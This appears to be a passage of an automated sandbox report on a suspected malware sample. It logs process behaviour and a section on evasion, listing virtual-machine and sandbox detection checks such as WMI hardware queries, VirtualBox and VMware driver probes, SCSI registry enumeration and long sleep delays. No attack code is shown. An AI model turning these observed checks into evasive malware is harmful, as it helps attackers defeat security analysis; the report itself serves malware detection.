Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check for Windows Defender sandbox

Source: C:\Users\user\AppData\Local\Temp\3530.exe

File Queried: C:\INTERNAL\__empty

Jump to behavior

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\sashibt	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\sashibt	API/Special instruction interceptor: Address: 7FF8C88ED584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: sashibt, 00000007.00000002.2706655309.0000000002657000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Memory allocated: 21F85D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Memory allocated: 21F9F820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Memory allocated: 21FA3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Memory allocated: 2598CDA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Memory allocated: 259A6780000 memory reserve \| memory write watch

Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmnet.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmmouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxtray.exe	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxhook.dll	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmci.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxservice.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe

Code function: 11_2_00007FF849010E55 sidt fword ptr [ecx-08h]

11_2_00007FF849010E55

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594906
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 478	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1265	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 704	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1858	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 864	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Window / User API: threadDelayed 1044	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9561
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 367

Source: C:\Windows\explorer.exe TID: 3288	Thread sleep time: -126500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6568	Thread sleep time: -70400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3288	Thread sleep time: -185800s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 5804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2952	Thread sleep time: -210000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536	Thread sleep time: -597937s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536	Thread sleep time: -594906s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\3530.exe

